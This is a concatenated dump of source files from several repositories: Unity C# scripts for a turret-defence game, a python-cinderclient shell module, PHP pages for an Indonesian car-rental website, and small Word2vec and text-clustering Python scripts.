GameController.instance.projectiles.add (p); } } } } <file_sep>/Mothership/Assets/CameraPan.cs using UnityEngine; using System.Collections; public class CameraPan : MonoBehaviour { public Rect bounds = new Rect(-2, -2, 4, 4); [Range(10, 1)] public float maxZoom = 2; [Range(20, 10)] public float minZoom = 10; private float baseSize; private float curZoom = 10; private bool moving = false; private Vector3 movePoint; private Vector3 anchor; private Camera cam; // Use this for initialization void Awake () { cam = GetComponentInChildren<Camera> (); baseSize = 
cam.orthographicSize; } // Update is called once per frame void FixedUpdate () { curZoom -= Input.GetAxis ("Mouse ScrollWheel") * 4; curZoom = Mathf.Clamp (curZoom, maxZoom, minZoom); cam.orthographicSize = baseSize * curZoom / 10.0f; if (moving) { transform.position = anchor + (movePoint - Input.mousePosition) * 0.01f * (curZoom / 10.0f); } } void Update() { if (Input.GetMouseButtonDown (2)) { movePoint = Input.mousePosition; anchor = transform.position; moving = true; } if (Input.GetMouseButtonUp (2)) { moving = false; } } } <file_sep>/Config/DefaultGame.ini [/Script/EngineSettings.GeneralProjectSettings] ProjectID=0615A7C74D365436501038A85503E2FD ProjectName=Twin Stick Game Template [/Script/Mothership.MothershipCharacter] FixedCameraPitch=-45.0 FixedCameraDistance=1500.0 [StartupActions] bAddPacks=True InsertPack=(PackSource="StarterContent.upack",PackName="StarterContent") <file_sep>/Mothership/Assets/Projectile.cs using UnityEngine; using System.Collections; [RequireComponent(typeof(Rigidbody2D))] [RequireComponent(typeof(Collider2D))] public class Projectile : MonoBehaviour { Vector3 start; void OnTriggerEnter2D(Collider2D other) { if(other.gameObject.GetComponentInChildren<Enemy>() != null) Destroy (gameObject); } void Awake() { start = transform.position; } void Update() { if(Vector3.Distance(start, transform.position) > 100) { Destroy(gameObject); } } } <file_sep>/Mothership/Assets/TurretSize.cs using UnityEngine; using System.Collections; public enum TurretSize { TINY, SMALL, MEDIUM, LARGE }<file_sep>/Mothership/Assets/GameController.cs using UnityEngine; using System.Collections; public class GameController : MonoBehaviour { public static GameController instance { get; private set; } public Enemies enemies { get; private set; } public ShipController ship { get; private set; } public Projectiles projectiles { get; private set; } // Use this for initialization void Awake () { if (instance != null) Debug.LogError ("Multiple controllers!"); instance = this; 
enemies = GetComponentInChildren<Enemies> (); projectiles = GetComponentInChildren<Projectiles> (); ship = FindObjectOfType<ShipController> (); ship.enable (); } } <file_sep>/Mothership/Assets/Global.cs using UnityEngine; using System.Collections; using System.Collections.Generic; public class Global : MonoBehaviour { private static Stack<string> sceneHistory = new Stack<string>(); public static void addToHistory(string scene) { sceneHistory.Push (scene); } public static string popFromHistory() { return sceneHistory.Pop (); } public static string peekFromHistory() { return sceneHistory.Peek (); } } <file_sep>/Mothership/Assets/TurretSlot.cs using UnityEngine; using System.Collections; [ExecuteInEditMode] public class TurretSlot : MonoBehaviour { public float maxAttackRadius = 30.0f; public float maxAttackRadius_L = 0; public float maxAttackRadius_R = 0; public Turret turret { get; private set; } public GameObject indicator; public TurretSize size; public bool hidden { get; private set; } // Use this for initialization void Awake () { if (indicator == null) { Debug.LogError("indicator is null!"); } } // Update is called once per frame void Update () { if (Application.isEditor) { maxAttackRadius = Mathf.Max((Mathf.Min(maxAttackRadius*2 + maxAttackRadius_L + maxAttackRadius_R, 360) - maxAttackRadius_L - maxAttackRadius_R)/2, 0); maxAttackRadius_L = Mathf.Max(Mathf.Min(maxAttackRadius_L, 180-maxAttackRadius), 0); maxAttackRadius_R = Mathf.Max(Mathf.Min(maxAttackRadius_R, 180-maxAttackRadius), 0); Vector3 l = transform.TransformDirection(Vector3.up); Vector3 r = transform.TransformDirection(Vector3.up); Quaternion ql = Quaternion.AngleAxis((-maxAttackRadius - maxAttackRadius_L), Vector3.back); Quaternion qr = Quaternion.AngleAxis((maxAttackRadius + maxAttackRadius_R), Vector3.back); l = ql * l; r = qr * r; Debug.DrawLine(transform.position, transform.position + l, Color.green); Debug.DrawLine(transform.position, transform.position + r, Color.green); } else { } } public 
void addTurret(Turret t) { Debug.Log ("addy"); if (!fits (t.size)) return; if (turret != null) { Destroy(turret.gameObject); } if (t.instantiated) { Debug.LogError("Tried to add an instantiated turret!"); return; } turret = (Turret)Instantiate(t); turret.transform.parent = transform; turret.transform.position = transform.position; turret.transform.rotation = transform.rotation; turret.tag = tag; turret.instantiate (this); if (indicator != null) indicator.SetActive (false); } public void removeTurret() { if (turret != null) { Destroy(turret); } if (indicator != null) indicator.SetActive (true); } void OnMouseUp() { Debug.Log ("FOO"); if (hidden) return; if (CurrentTool.instance.current != null) { addTurret(CurrentTool.instance.current); } } public bool fits(TurretSize t) { switch (size) { case TurretSize.LARGE: return true; //goto case TurretSize.MEDIUM; case TurretSize.MEDIUM: if(t == TurretSize.MEDIUM) return true; goto case TurretSize.SMALL; case TurretSize.SMALL: if(t == TurretSize.SMALL) return true; goto case TurretSize.TINY; case TurretSize.TINY: if(t == TurretSize.TINY) return true; return false; default: Debug.LogError("Wierd enum: " + t); return false; } } public void hide() { hidden = true; indicator.SetActive (false); } public void show() { indicator.SetActive (true); } } <file_sep>/Source/Mothership/Mothership.cpp // Copyright 1998-2015 Epic Games, Inc. All Rights Reserved. 
#include "Mothership.h" IMPLEMENT_PRIMARY_GAME_MODULE( FDefaultGameModuleImpl, Mothership, "Mothership" ); DEFINE_LOG_CATEGORY(LogMothership) <file_sep>/Mothership/Assets/CameraFollow.cs using UnityEngine; using System.Collections; public class CameraFollow : MonoBehaviour { Transform target; // Use this for initialization void Awake () { target = FindObjectOfType<ShipController> ().transform; } // Update is called once per frame void FixedUpdate () { if (target != null) { transform.position = Vector3.Lerp(transform.position, target.position, 0.2f); } } } <file_sep>/Mothership/Assets/Plasma_Turret.cs using UnityEngine; using System.Collections; public class Plasma_Turret : Turret { public Projectile bullet; public float spawnDistance = 0.2f; public float cooldown = 1.0f; public float projectileSpeed = 4; private float lastShot; protected override void fire() { if (lastShot + cooldown < Time.time) { lastShot = Time.time; foreach(Enemy target in targets) { Projectile p = (Projectile) Instantiate(bullet); p.transform.position = transform.position + (target.transform.position - transform.TransformPoint(transform.localPosition)).normalized * spawnDistance; p.tag = tag; p.GetComponent<Rigidbody2D>().velocity = (target.transform.position - p.transform.position).normalized * projectileSpeed; GameController.instance.projectiles.add(p); } } } } <file_sep>/Mothership/Assets/Enemies.cs using UnityEngine; using System.Collections; public class Enemies : MonoBehaviour { public Enemy[] list { get { return _list; } } private Enemy[] _list = new Enemy[0]; void Update() { } void LateUpdate() { _list = transform.GetComponentsInChildren<Enemy> (); } public void add(Enemy enemy) { enemy.transform.parent = transform; } } <file_sep>/Mothership/Assets/Tooltip.cs using UnityEngine; using UnityEngine.UI; using System.Collections; [RequireComponent(typeof(Text))] public class Tooltip : MonoBehaviour { private Text t; void Awake() { t = GetComponent<Text> (); } public void setText(string 
text) { t.text = text; } } <file_sep>/Mothership/Assets/Projectiles.cs using UnityEngine; using System.Collections; public class Projectiles : MonoBehaviour { public void add(Projectile projectile) { projectile.transform.parent = transform; } }
96757e74aded24eb00d5a3c16c37252dda7383b9
[ "C#", "C++", "INI" ]
21
C#
Ryxali/Mothership
fdd88c468fb15450f38b3958057c97e4bebe3a2f
24eaf960bc54d621dbab5a4dbd4572629a0829bd
refs/heads/master
<repo_name>geosharath/python-cinderclient<file_sep>/cinderclient/v2/shell.py
# Copyright (c) 2013-2014 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#    http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.

# The v2 shell is a thin shim over the v3 shell: re-export everything...
from cinderclient.v3.shell import *  # flake8: noqa

from cinderclient import utils

# ...then re-tag the imported command functions from the 'volumev3' service
# type to 'volumev2' in this module's namespace (presumably so the v2 client
# dispatches them against the v2 endpoint — see cinderclient.utils.retype_method).
utils.retype_method('volumev3', 'volumev2', globals())


# Below is shameless hack for unit tests
# TODO remove after deciding if unit tests are moved to /v3/ dir
def _treeizeAvailabilityZone(zone):
    """Builds a tree view for availability zones.

    Flattens one availability zone into a list of AvailabilityZone display
    rows: the zone itself, then one '|- <host>' row per host, then one
    '| |- <service>' row per service on that host. zoneName/zoneState are
    set both as attributes and in _info so table printers pick them up.

    Relies on names pulled in by the star import above (availability_zones,
    copy) — do not remove that import.
    """
    AvailabilityZone = availability_zones.AvailabilityZone
    az = AvailabilityZone(zone.manager,
                          copy.deepcopy(zone._info), zone._loaded)
    result = []

    # Zone tree view item
    az.zoneName = zone.zoneName
    az.zoneState = ('available'
                    if zone.zoneState['available'] else 'not available')
    az._info['zoneName'] = az.zoneName
    az._info['zoneState'] = az.zoneState
    result.append(az)

    # NOTE(review): the second condition is redundant — getattr(..., None)
    # already yields a falsy value when hosts is None.
    if getattr(zone, "hosts", None) and zone.hosts is not None:
        for (host, services) in zone.hosts.items():
            # Host tree view item ('|- host' indents it under the zone row)
            az = AvailabilityZone(zone.manager,
                                  copy.deepcopy(zone._info), zone._loaded)
            az.zoneName = '|- %s' % host
            az.zoneState = ''
            az._info['zoneName'] = az.zoneName
            az._info['zoneState'] = az.zoneState
            result.append(az)

            for (svc, state) in services.items():
                # Service tree view item: "<enabled|disabled> <:-)|XXX>
                # <updated_at>" — ':-)' means the service is available,
                # 'XXX' that it is not.
                az = AvailabilityZone(zone.manager,
                                      copy.deepcopy(zone._info), zone._loaded)
                az.zoneName = '| |- %s' % svc
                az.zoneState = '%s %s %s' % (
                    'enabled' if state['active'] else 'disabled',
                    ':-)' if state['available'] else 'XXX',
                    state['updated_at'])
                az._info['zoneName'] = az.zoneName
                az._info['zoneState'] = az.zoneState
                result.append(az)
    return result
97c71589aa33441a5336348eb78ef707fe0a6df4
[ "Python" ]
1
Python
geosharath/python-cinderclient
d07b424bed6c462b6075f9a3f7ae066a0bb4d49c
77e88be4a599f40fd197611ed48366338c4134d3
refs/heads/master
<file_sep><html> <head> <title>Jenis Kendaraan - MobilIndonesia.com</title> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="page-header"> <h2><center>JENIS KENDARAAN</center></h2> </div> <div class="text-center"> <h4>KENDARAAN YANG TERSEDIA DI</h4> <h2>MOBILINDONESIA.COM</h2> <p>Ada banyak jenis kendaraan yang tersedia di kami,salah satu nya yang ada di list dibawah ini</p> <div class="jenis-mobil"> <div class="mobil"> <img src="img/apv.jpg"> <p> SUZUKI APV<br> KEADAAN RAPIH<br> 1495 CC<br> RP : 1.3 JT/HARI </p> </div> <div class="mobil"> <img src="img/jazz.jpg"> <p> HONDA JAZZ<br> KEADAAN SANGAT BAIK<br> 1497 CC<br> 1.5 JT/HARI </p> </div> <div class="mobil"> <img src="img/ayla.jpg"> <p> DAIHATSU AYLA<br> KEADAAN SANGAT BAIK<br> 998 CC<br> 1 JT/HARI </p> </div> <div class="mobil"> <img src="img/swift.jpg"> <p> SUZUKI SWIFT<br> KEADAAN SANGAT BAIK<br> 1372 CC<br> 1.5 JT/HARI </p> </div> <div class="mobil"> <img src="img/agya.jpg"> <p> TOYOTA AGYA<br> KEADAAN SANGAT BAIK<br> 1200 CC<br> 1.3 JT/HARI </p> </div> <div class="mobil"> <img src="img/terios.jpg"> <p> DAIHATSU TERIOS<br> KEADAAN SANGAT BAIK<br> 1496 CC<br> 1.5 JT/HARI </p> </div> <div class="mobil"> <img src="img/expander_banyak.jpg"> <p> MITSUBISHI EXPANDER<br> KEADAAN SANGAT BAIK<br> 1499 CC<br> 1.7 JT/HARI </p> </div> <div class="mobil"> <img src="img/brio.jpg"> <p> <NAME><br> KEADAAN SANGAT BAIK<br> 1198 CC<br> 1.4 JT/HARI </p> </div> <div class="mobil"> <img src="img/picanto.jpg"> <p> KIA PICANTO<br> KEADAAN SANGAT BAIK<br> 1250CC<br> 1.1 JT/HARI </p> </div> <br class="clear"> </div> </div> <?php include("footer.php"); ?> </body> <html> <file_sep># MobilIndonesia.com Tampilan FronEnd Website penyewaan mobil dengan CSS (belum belum terdapat fungsi apapun). 
![HomeMobil](https://user-images.githubusercontent.com/56223221/216827552-3f68cca8-8cab-4114-8014-53016a0d0385.png) ![TestiMobil](https://user-images.githubusercontent.com/56223221/216827611-06a1903f-eb70-454a-8294-f4b28afdbf0c.png) ![JenisMobil](https://user-images.githubusercontent.com/56223221/216827597-6a0e584c-055d-42b6-8f5b-06ed021fd225.png) <file_sep><html> <head> <title>About - MobilIndonesia.com</title> <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@100;700&display=swap" rel="stylesheet"> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="page-header"> <h2><center>ABOUT</center></h2> </div> <div> <div class="banner"> <div class="slogan"> <h1>MOBILINDONEISA.COM</h1> <p>kami menyediakan berbagai jenis kendaraan untuk kalian sewa, baik itu kendaraan kecil atau kendaraan sejenis travel, kami juga menyediakan penyewaan supir, tentunya dengan banyak diskon yang akan kalian dapat.</p> <h4>Yuu sewa kendaraan di MOBILINDONESIA.COM</h4> </div> </div> <div class="banner"> <div class="img-container"> <img src="img/about.png" alt=""> </div> </div> <br class="clear"> </div> <div> <div class="section-header"> <h2>Profil Perusahaan</h2> </div> <div class="perusahaan"> <p>MOBILINDONESIA.COM merupakan sebuah perusahaan rental Mobil terbesar saat ini, sudah dangat dipercayai oleh berbagai pihak. Kami juga menyediakan banyak jenis kendaraan yang bisa anda pesan. 
Untuk lebih jelasnya tentang kendaraan yang ada di perusahaan kami silahkan mengunjungi bagian Kendaraan.</p> </div> </div> <div class="text-center"> <div class="section-header"> <h1 class="title"><NAME></h1> </div> <div class="about img"> <img src="img/ihsan.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center">Ihsan Taofik</h2> <p class="text-center">10119315</p> <h2 class="text-center">DIREKTUR KEUANGAN</h2> </div> <div class="about img"> <img src="img/adi.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center">Adi Rizal</h2> <p class="text-center">10119318</p> <h2 class="text-center">DIREKTUR IT</h2> </div> <div class="about img"> <img src="img/aldy.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center"><NAME></h2> <p class="text-center">10119297</p> <h2 class="text-center">PRESIDENT DIREKTUR</h2> </div> <br class="clear"> <div class="about img"> <img src="img/lutfi.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center">Lutfi Azmi</h2> <p class="text-center">10119326</p> <h2 class="text-center">DIREKTUR PEMASARAN</h2> </div> <div class="about img"> <img src="img/rafi.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center"><NAME></h2> <p class="text-center">10119329</p> <h2 class="text-center">DIREKTUR SDM</h2> </div> <div class="about img"> <img src="img/john.jpg"> <div class="garis-container text-center"> <div class="garis-putih"></div> </div> <h2 class="text-center"><NAME></h2> <p class="text-center">10119349</p> <h2 class="text-center">DIREKTUR ASET</h2> </div> <br class="clear"> <div class="jurusan"> <h3 id="kelas-container" class="text-center"></h3> <h3 id="jurusan-container" class=" text-center"></h3> <h3 id="fakultas-container" class="text-center"></h3> </div> </div> <script> 
kelas = 'IF-8'; jurusan = 'Teknik Informatika'; fakultas = 'Fakultas Teknik & Ilmu Komputer'; document.getElementById('kelas-container').innerHTML = kelas; document.getElementById('jurusan-container').innerHTML = jurusan; document.getElementById('fakultas-container').innerHTML = fakultas; </script> <?php include("footer.php"); ?> </body> </html> <file_sep> <html> <head> <title>Hubungi Kami - MobilIndonesia.com</title> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="page-header"> <h2><center>HUBUNGI KAMI</center></h2> </div> <div class="halaman halaman-testimoni"> <h2>Sosial Media</h2> <p>Facebook : <a href="#">https://www.facebook.com/mobilindonesia.com</a>.</p> <p>Website : <a href="#">https://www.website.com/mobilindonesia.com</a>.</p> <p>Twitter : <a href="#">https://www.twitter.com/mobilindonesia.com</a>.</p> <p>Instagram : <a href="#">https://www.instagram.com/mobilindonesia.com</a>.</p> </div> <?php include("footer.php"); ?> </body> </html><file_sep><html> <head> <title>Testimoni - MobilIndonesia.com</title> <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@100;700&display=swap" rel="stylesheet"> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="page-header"> <h2><center>TESTIMONI</center></h2> </div> <div> <div class="banner"> <div class="slogan"> <h2>TESTIMONI PENGUNJUNG MOBILINDONEISA.COM</h2> <p>Ragu dengan apa yang sudah anda lihat semua ini, Tenang kami mempunya beberapa Feedback dari pelanggan kami yang mungkin bisa memastikan anda.</p> </div> </div> <div class="banner"> <div class="img-container"> <img src="img/testimoni.png" alt=""> </div> </div> </div> <br class="clear"> <div class="testimoni-content "> <div class="testimoni-pengunjung"> <img src="img/artis1.jpg"> <p>Sangat bagus, sangat recomended untuk kalian coba</p> </div> <div class="testimoni-pengunjung"> <img src="img/artis2.jpg"> <p>Bagus 
banget, selain murah banyak diskon juga yang akan kita dapet ketika kita pesan sekalian sama supirnya</p> </div> <div class="testimoni-pengunjung"> <img src="img/artis3.jpg"> <p>Mobilnya bagus bagus, perjalanan jauh jadi nyaman, recomended dehh....</p> </div> <br class="clear"> <div class="testimoni-pengunjung"> <img src="img/artis4.jpg"> <p>Sangat bagus, sangat recomended untuk kalian coba</p> </div> <div class="testimoni-pengunjung"> <img src="img/artis5.jpg"> <p>Bagus banget, selain murah banyak diskon juga yang akan kita dapet ketika kita pesan sekalian sama supirnya</p> </div> <div class="testimoni-pengunjung"> <img src="img/artis6.jpg"> <p>Mobilnya bagus bagus, perjalanan jauh jadi nyaman, recomended dehh....</p> </div> <br class= "clear"> </div> <?php include("footer.php"); ?> </body> </html><file_sep><html> <head> <title> Penyewaan - MobilIndonesia.com </title> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="page-header"> <h2><center>PENYEWAAN</center></h2> </div> <div> <table class="center"> <tr> <td> <table> <tr> <td colspan="2"> <h2>Input Pembayaran</h2> </td> </tr> <tr> <td><NAME></td> <td><input class = "warna"type="text" id="input_nim" size="25" onFocus="sorot(this)" onBlur="hilang(this)"/></td> </tr> <tr> <td>Pilihan Mobil</td> <td> <select id="input_mobil" onFocus="sorot(this)" onBlur="hilang(this)"> <option value="Toyota Avanza">Toyota Avanza</option> <option value="Daihatsu Terios">Daihatsu Terios</option> <option value="Honda jazz">Honda jazz</option> <option value="Suzuki APV">Suzuki APV</option> </select> </td> </tr> <tr> <td>Tanggal Sewa</td> <td><input type="text" id="tanggal_sewa" size="25" onFocus="sorot(this)" onBlur="hilang(this)" /></td> </tr> <tr> <td>Lama Sewa</td> <td><input type="text" id="lama_sewa" size="25" onFocus="sorot(this)" onBlur="hilang(this)" /></td> </tr> <tr> <td>Sewa Supir</td> <td> <input type="checkbox" id="input_member" value="true" /> Ya </td> 
</tr> <tr> <td colspan="2"> <button id="button_tampilkan" onClick="tampil();">Tampil</button> <button id="button_hapus" onClick="hapus();">Hapus</button> </td> </tr> </table> <table class="table-output"> <tr> <td colspan="2"> <h2>Output Pembayaran</h2> </td> </tr> <tr> <td>Mobil Yang Disewa</td> <td><input type="text" id="output_sewa" /></td> </tr> <tr> <td>Tanggal Sewa</td> <td><input type="text" id="output_tanggal_sewa"/></td> </tr> <tr> <td>Harga Sewa</td> <td><input type="text" id="output_harga_sewa" /></td> </tr> <tr> <td>Subtotal</td> <td><input type="text" id="output_subtotal" /></td> </tr> <tr> <td>Total Biaya supir</td> <td><input type="text" id="output_biaya_supir" /></td> </tr> <tr> <td>Diskon</td> <td><input type="text" id="output_diskon" /></td> </tr> <tr> <td>Total Pembayaran</td> <td><input type="text" id="output_total_pembayaran" /></td> </tr> </table> </td> </tr> </table> </div> <div class="table-output buttom"> <p class="text-center">Terima kasih sudah berkunjung, semoga anda bisa menikmati pelayanan dari kami.</p> </div> <script> var tanggal = new Date (); var hari = new Array ("Senin","Selasa","Rabu","Kamis","Jumat","Sabtu"); var bulan = new Array ("Januari","Februari","Maret","April","Mei","Juni","Juli","Agustus","September","Oktober","November","Desember"); var hari_ini = hari [tanggal.getDay()]; var tgl = tanggal.getDate(); var bln = bulan[tanggal.getMonth()]; var thn = tanggal.getFullYear(); document.getElementById('tanggal_sewa').value = ( tgl +" "+ bln +" "+ thn); function tampil() { document.getElementById('output_sewa').value = document.getElementById('output_sewa').value; if (document.getElementById('output_sewa').value == 'Toyota Avanza') { var harga = 450000; document.getElementById('output_harga_sewa').value = harga; } else if (document.getElementById('output_sewa').value == 'Daihatsu Terios') { var harga = 300000; document.getElementById('output_harga_sewa').value = harga; } else if (document.getElementById('output_sewa').value == 
'Honda Jazz') { var harga = 600000; document.getElementById('output_harga_sewa').value = harga; } else if (document.getElementById('output_sewa').value == 'Suzuki APV') { var harga = 500000; document.getElementById('output_harga_sewa').value = harga; } else { var harga = 65000; document.getElementById('output_harga_sewa').value = harga; } document.getElementById('output_sewa').value = document.getElementById('input_mobil').value; if ( document.getElementById('lama_sewa').value >= 5 && document.getElementById('lama_sewa').value < 10) { var diskon = (document.getElementById('lama_sewa').value * harga) * 0.10; var sub_total = (document.getElementById('lama_sewa').value * harga) - diskon ; } else if ( document.getElementById('lama_sewa').value >= 10) { var diskon = (document.getElementById('lama_sewa').value * harga) * 0.25; var sub_total = (document.getElementById('lama_sewa').value * harga) - diskon ; } else { var diskon = ''; var sub_total = ''; } document.getElementById('output_subtotal').value = sub_total; if (document.getElementById('input_member').checked == true) { var bayar_supir = 75000 * document.getElementById('lama_sewa').value; } else { var bayar_supir =''; } document.getElementById('output_biaya_supir').value = bayar_supir; document.getElementById('output_diskon').value = diskon; document.getElementById('output_total_pembayaran').value = sub_total + bayar_supir; document.getElementById('output_tanggal_sewa').value = document.getElementById('tanggal_sewa').value; } </script> </center> </div> <?php include("footer.php"); ?> </body> </html><file_sep><!DOCTYPE html> <html> <head> <title>Home - MobilIndonesia.com</title> <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@100;700&display=swap" rel="stylesheet"> <link rel="stylesheet" type="text/css" href="css/style.css"> </head> <body> <?php include("menu.php"); ?> <div class="banner-container"> <div class="banner"> <div class="slogan"> <h1>MOBILINDONEISA.COM</h1> <h2>RENTAL MOBIL TERBAIK YANG 
ADA SAAT INI</h2> <p>Selamat datang di MOBILINDONESIA.COM kami mengutamakan pelayanan terbaik demi membuat kesan terbaik</p> </div> </div> <div class="banner"> <div class="img-container"> <img src="img/logo.png" alt=""> </div> </div> <br class="clear"> </div> <div class="section-header"> <h2>TRENDING DI MOBILINDONESIA.COM</h2> <p>PELAYANAN ADALAH YANG UTAMA BAGI KAMI</p> </div> <div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilAvanza, gantiGambarAvanza[baru])" onMouseout ="gantiGambar (mobilAvanza, gantiGambarAvanza[sumber])"> <img src="img/avanza.jpg" width="200" height="100" name="mobilAvanza" border=0> </a> <p> <font-family face="Arial" ><center>Toyota Avanza</center></font-family> </p> </div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilTerios, gantiGambarTerios[baru])" onMouseout ="gantiGambar (mobilTerios, gantiGambarTerios[sumber])"> <img src="img/terios.jpg" width="200" height="100" name="mobilTerios" border=0> </a> <p> <font-family face="Arial" ><center>Daihatsu Terios</center></font-family> </p> </div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilJazz, gantiGambarJazz[baru])" onMouseout ="gantiGambar (mobilJazz, gantiGambarJazz[sumber])"> <img src="img/jazz.jpg" width="200" height="100" name="mobilJazz" border=0> </a> <p> <font-family face="Arial" ><center>Honda Jazz</center></font-family> </p> </div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilAPV, gantiGambarAPV[baru])" onMouseout ="gantiGambar (mobilAPV, gantiGambarAPV[sumber])"> <img src="img/apv.jpg" width="200" height="100" name="mobilAPV" border=0> </a> <p> <font-family face="Arial" ><center>Suzuki APV</center></font-family> </p> </div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilBrio, gantiGambarBrio[baru])" onMouseout ="gantiGambar (mobilBrio, gantiGambarBrio[sumber])"> <img src="img/brio.jpg" width="200" height="100" name="mobilBrio" border=0> </a> <p> <font-family 
face="Arial" ><center>Honda Brio</center></font-family> </p> </div> <div class="trending-car"> <a href="#" onMouseOver ="gantiGambar (mobilExpander, gantiGambarExpander[baru])" onMouseout ="gantiGambar (mobilExpander, gantiGambarExpander[sumber])"> <img src="img/expander.jpg" width="200" height="100" name="mobilExpander" border=0> </a> <p> <font-family face="Arial" ><center>Honda Brio</center></font-family> </p> </div> <br class="clear"> </div> <script> var sumber = 0; var baru = 1; function ciptakanArray (gambarAwal, gambarBaru){ var arrayGambar = new Array; arrayGambar[sumber] = new Image; arrayGambar[sumber].src = gambarAwal; arrayGambar[baru] = new Image; arrayGambar[baru].src = gambarBaru; return arrayGambar; } function gantiGambar (gambarTarget, gambarTampil){ gambarTarget.src = gambarTampil.src; } var gantiGambarAvanza = ciptakanArray ("img/avanza.jpg", "img/avanza_banyak.jpg") var gantiGambarTerios = ciptakanArray ("img/terios.jpg", "img/terios_banyak.jpg") var gantiGambarJazz = ciptakanArray ("img/jazz.jpg", "img/jazz_banyak.jpg") var gantiGambarAPV = ciptakanArray ("img/apv.jpg", "img/apv_banyak.jpg") var gantiGambarBrio = ciptakanArray ("img/brio.jpg", "img/brio_banyak.jpg") var gantiGambarExpander = ciptakanArray ("img/expander.jpg", "img/expander_banyak.jpg") </script> <?php include("footer.php"); ?> </body> </html>
65f5a31d4fed5fc864d61506c6d463c13bd2f863
[ "Markdown", "PHP" ]
7
PHP
ihsantaofik94/MobilIndonesia.com
14eaf305b107719f3938978c4e5c4ba52767687e
c7334f0ecd610212c20f5bd2e6a0760165c5a286
refs/heads/master
<repo_name>UDIC-lab-NCHU/hsiang_project<file_sep>/Word2vec/grep_cal_cp.sh #!/bin/bash python find_similar_word.py $1 READFILE="similar_word.txt" i=0 while read line; do arr[$i]="$line" i=$(($i+1)) done < $READFILE for array in "${arr[@]}" do grep -w $array topic_find_data > similar_word.topic python grep_cal_relation_w2v.py similar_word.topic $array done <file_sep>/Word2vec/find_similar_word_cp.py # -*- coding: utf-8 -*- import gensim,sys model = gensim.models.Word2Vec.load("wiki.zh.text.model") result=model.most_similar(sys.argv[1].decode('utf8')) with open('similar_word.txt', 'w') as the_file: for e in result: the_file.write(e[0].encode('utf8')+'\n') <file_sep>/Cluster/test.py import os with open("/home/nchu-csie/hsiang_project/Cluster/document_cluster/synopses_list_imdb.txt") as f: content = f.readlines() print content <file_sep>/Word2vec/grep_cal_relation_w2v_cp.py # -*- coding: utf-8 -*- import json,codecs import gensim,sys similar=[] relation={} dic={} i=0 with open('data.json', 'rb') as fp: dic = json.loads(fp.read().decode('utf8')) with open(sys.argv[1], 'rb') as fp: for line in fp: if line != "": (key1, key2, val) = line.split() key1=key1.decode('utf8') key2=key2.decode('utf8') if key1==sys.argv[2].decode('utf8'): if key2 in dic: dic[key2]+=val else: dic[key2]=val elif key2==sys.argv[2].decode('utf8'): if key1 in dic: dic[key1]=val else: dic[key1]=val with codecs.open("data.json", 'w',encoding='utf-8') as fout: json.dump(dic,fout,ensure_ascii=False,indent=4) <file_sep>/Cluster/stopwords.py from __future__ import print_function import numpy as np import pandas as pd import nltk import re import os import codecs from sklearn import feature_extraction import mpld3 from nltk.stem.snowball import SnowballStemmer from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.metrics.pairwise import cosine_similarity from sklearn.cluster import KMeans from sklearn.externals import joblib def tokenize_and_stem(text): # first tokenize by sentence, then by 
word to ensure that punctuation is caught as it's own token tokens = [word for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)] filtered_tokens = [] # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation) for token in tokens: if re.search('[a-zA-Z]', token): filtered_tokens.append(token) stems = [stemmer.stem(t) for t in filtered_tokens] return stems def tokenize_only(text): # first tokenize by sentence, then by word to ensure that punctuation is caught as it's own token tokens = [word.lower() for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)] filtered_tokens = [] # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation) for token in tokens: if re.search('[a-zA-Z]', token): filtered_tokens.append(token) return filtered_tokens stopwords = nltk.corpus.stopwords.words('english') print(stopwords[:10]) stemmer = SnowballStemmer("english") #not super pythonic, no, not at all. #use extend so it's a big flat list of vocab totalvocab_stemmed = [] totalvocab_tokenized = [] synopses=[] synopsis="" for line in open('/home/nchu-csie/hsiang_project/Cluster/synopses_list_imdb.txt'): line=line.rstrip('\n') if line == " BREAKS HERE": synopses.append(synopsis) synopsis="" elif line not in ['\n', '\r\n']: synopsis+=line cnt=0 for line in open('/home/nchu-csie/hsiang_project/Cluster/synopses_list_wiki.txt'): line=line.rstrip('\n') if "BREAKS HERE" in line: synopses[cnt]+=synopsis synopsis="" cnt+=1 elif line not in ['\n', '\r\n'] and "Plot [edit] [ [ edit edit ] ]" not in line: synopsis+=line for i in synopses: allwords_stemmed = tokenize_and_stem(i.decode('utf8')) #for each item in 'synopses', tokenize/stem totalvocab_stemmed.extend(allwords_stemmed) #extend the 'totalvocab_stemmed' list allwords_tokenized = tokenize_only(i.decode('utf8')) totalvocab_tokenized.extend(allwords_tokenized) vocab_frame = pd.DataFrame({'words': 